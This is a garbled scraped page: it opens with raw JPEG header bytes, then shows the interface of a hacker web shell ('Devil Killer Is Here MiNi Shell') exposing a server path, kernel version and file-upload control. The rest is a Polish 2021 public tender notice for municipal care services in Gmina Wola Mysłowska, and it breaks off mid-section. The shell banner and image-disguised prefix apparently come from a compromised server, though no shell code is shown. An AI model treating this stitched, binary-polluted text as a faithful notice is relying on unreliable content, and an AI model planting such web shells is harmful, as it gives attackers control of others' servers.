JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210625/0009576501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00095765 z dnia 2021-06-25</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Wsparcie niesamodzielnych i niepełnosprawnych w Gminie Wola Mysłowska”- świadczenie usług opiekuńczych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA WOLA MYSŁOWSKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582546</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">57</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wola Mysłowska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-426</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">025 754 25 22</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@wolamyslowska.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wolamylowska.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> usługi społeczne - opiekuńcze </p> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Gminny Ośrodek Pomocy Społecznej w Woli Mysłowskiej</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">8252058109</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Wola Mysłowska 57B</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Wola Mysłowska</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">21-426</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">025 754 25 38</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">gops@wolamyslowska.com.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">http://wolamyslowska.com.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wsparcie niesamodzielnych i niepełnosprawnych w Gminie Wola Mysłowska”- świadczenie usług opiekuńczych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6ec454cd-d5a6-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00095765</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005118/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Wsparcie niesamodzielnych i niepełnosprawnych w Gminie Wola Mysłowska- świadczenie usług opiekuńczych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Regionalny Program Operacyjny Województwa Lubelskiego na lata 2014-2020, Oś Priorytetowa; 11 Włączenie społeczne, Działanie 11.2. Usługi społeczne i zdrowotne, </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wolamyslowska.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej za pośrednictwem platformy zakupowej zamawiającego przez link: https://wolamyslowska.ezamawiajacy.pl. Instrukcja korzystania z systemu jest dostępna pod wyżej wskazanym adresem. Wykonawca może zwrócić się do zamawiającego z wnioskiem o wyjaśnienie odpowiednio treści SWZ. Jedynie w tym zakresie Zamawiający dopuszcza komunikację z Wykonawcami za pomocą poczty elektronicznej, e-mail: gops@wolamyslowska.com.pl w godzinach pracy Zamawiającego. Korespondencja, która wpłynie do Zamawiającego po godzinach jego urzędowania będzie otwierana i odczytana w następnym dniu roboczym. W celu ułatwienia pracy związanej z odpowiedziami na zapytania Zamawiający zaleca przesyłanie zapytań do treści SWZ dodatkowo w wersji edytowalnej.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający wskazuje informacje, o których mowa w Rozporządzenia Prezesa Rady Ministrów w<br/>sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych, dotyczące systemu<br/>dostępnego pod adresem https://wolamyslowska.ezamawiajacy.pl:<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta<br/>• Wybrana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome<br/>lub MS Edge<br/>• Podłączenie do Internetu: min. 512 Kb/s na komputer (zalecane szerokopasmowe łącze internetowe);<br/>Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie<br/>Zakupowej tj.:<br/>• Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>• Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>• Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji<br/>w przypadku Internet Explorer minimalnie wersja 10.0;<br/>• Włączona obsługa JavaScript;<br/>• Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające prawidłowe złożenie<br/>podpisu elektronicznego:<br/>• Rekomendowaną przeglądarką do złożenia oferty jest MS Internet Explorer lub Firefox w wersji<br/>wpieranej przez producenta.<br/>• Uruchomienie oprogramowania do składania podpisu wymaga również zainstalowania Java w wersji<br/>1.8.0_65 lub nowszej, koniecznie w wersji 32-bitowej, pozwalające na przyjmowanie przez użytkownika<br/>sesyjnych plików cookie oraz obsługującej szyfrowanie. Konieczne jest również dodanie adresu witryny<br/>platformy eZamawiający (ezamawiający.pl) do wyjątków (exception site list) w Javie. Uwaga: wymaga<br/>to uprawnień administracyjnych na komputerze.<br/>• Zainstaluj dedykowany komponent Szafir SDK oraz aplikację Szafir Host, który odpowiada za obsługę<br/>funkcjonalności podpisu elektronicznego w platformie eZamawiający. Rozszerzenie Szafir SDK można<br/>pobrać tutaj. Po zainstalowaniu rozszerzenia Szafir SDK oraz aplikacji Szafir Host należy przeładować<br/>bieżącą stronę.<br/>• Przed uruchomieniem platformy eZamawiający, w pierwszej kolejności podłącz czytnik z kartą<br/>kryptograficzną do komputera.<br/>Informacje dotyczące odpowiedniego przygotowania stanowiska znajdą Państwa na stronie:<br/>https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki<br/>Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w<br/>txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg,<br/>wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd,<br/>gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>• Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po<br/>odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>• Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający<br/>informuje, że: Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał<br/>w niniejszym postępowaniu; dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1<br/>lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn:<br/>„Wsparcie niesamodzielnych i niepełnosprawnych w Gminie Wola Mysłowska”- świadczenie usług<br/>opiekuńczych prowadzonym w trybie podstawowym bez negocjacji;<br/>1) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o jawność postępowania (między innymi art. 18, art. 74, art.<br/>252 art. 260 Ustawy).<br/>2) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy. Okresy wskazane powyżej mogą<br/>zostać przedłużone do czasu upływu okresu przedawnienia ewentualnych roszczeń, jeśli<br/>przetwarzanie danych osobowych będzie niezbędne do dochodzenia lub obrony przed takimi<br/>roszczeniami lub jeżeli przetwarzanie jest niezbędne na podstawie innych przepisów prawa.<br/>3) Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w<br/>przepisanych Ustawy związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>4) Przysługują Pani/Panu następujące prawa związane z przetwarzaniem danych osobowych:<br/>1) prawo dostępu do Pani/Pana danych osobowych;<br/>2) prawo żądania sprostowania Pani/Pana danych osobowych zgodnie z art. 16 RODO, jednak<br/>skorzystacie z tego prawa nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą;<br/>3) prawo żądania usunięcia Pani/Pana danych osobowych, w sytuacji, gdy przetwarzanie danych nie<br/>następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach<br/>sprawowania władzy publicznej;<br/>4) prawo żądania ograniczenia przetwarzania Pani/Pana danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO. Zgłoszenie żądania ograniczenia przetwarzania, o<br/>którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia tego postępowania.<br/>5) Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>6) Dane osobowe nie będą przekazywane do państw trzecich ani organizacji międzynarodowych. Dane<br/>osobowe nie będą służyły profilowaniu, w tym zautomatyzowanemu podejmowaniu decyzji.<br/>Zamawiający dodatkowo informuje, że obowiązek stosowania przepisów RODO spoczywa także na<br/>Wykonawcy, co oznacza, że wykonawca jest zobowiązany spełnić obowiązek informacyjny, o którym<br/>mowa w art. 13 lub 14 RODO, w stosunku do osób trzecich, których dane osobowe Wykonawca<br/>pozyskuje w celu przekazania ich Zamawiającemu w ofertach lub innych dokumentach w<br/>postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GOŚ.271.16.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Liczba godzin na 1 uczestnika projektu: średnio 16 h/miesiąc<br/>Usługa opiekuńcza świadczona na rzecz minimum 5 podopiecznych ok. 80 h/ na miesiąc tj.<br/>do1760 h od dnia podpisania umowy do 30.04.2023 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311100-3 - Usługi opieki społecznej dla osób starszych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert będzie ostatecznie wyliczana według wzoru: OCENA = C +<br/>D+ AS. Maksymalna liczba punktów w kryterium „cena” , „doświadczenie” i „ aspekt społeczny”.<br/>Kryteria oceny ofert nie podlegają zmianie podczas ich badania. Zamawiający ocenia ofertę do dwóch<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>miejsc po przecinku. Zamówienie zostanie udzielone Wykonawcy, który uzyska najwyższą liczbę<br/>punktów w wyniku oceny ofert w zakresie danej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">aspekt społeczny - zatrudnienie osób bezrobotnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Liczba godzin na 1 uczestnika projektu: średnio 16 h/miesiąc<br/>Usługa opiekuńcza świadczona na rzecz minimum 5 podopiecznych ok. 80 h/ na miesiąc tj.<br/>do1760 h od dnia podpisania umowy do 30.04.2023 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311100-3 - Usługi opieki społecznej dla osób starszych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert będzie ostatecznie wyliczana według wzoru: OCENA = C +<br/>D+ AS. Maksymalna liczba punktów w kryterium „cena” , „doświadczenie” i „ aspekt społeczny”.<br/>Kryteria oceny ofert nie podlegają zmianie podczas ich badania. Zamawiający ocenia ofertę do dwóch<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>miejsc po przecinku. Zamówienie zostanie udzielone Wykonawcy, który uzyska najwyższą liczbę<br/>punktów w wyniku oceny ofert w zakresie danej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">aspekt społeczny - zatrudnienie osób bezrobotnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Liczba godzin na 1 uczestnika projektu: średnio 16 h/miesiąc<br/>Usługa opiekuńcza świadczona na rzecz minimum 5 podopiecznych ok. 80 h/ na miesiąc tj.<br/>do1760 h od dnia podpisania umowy do 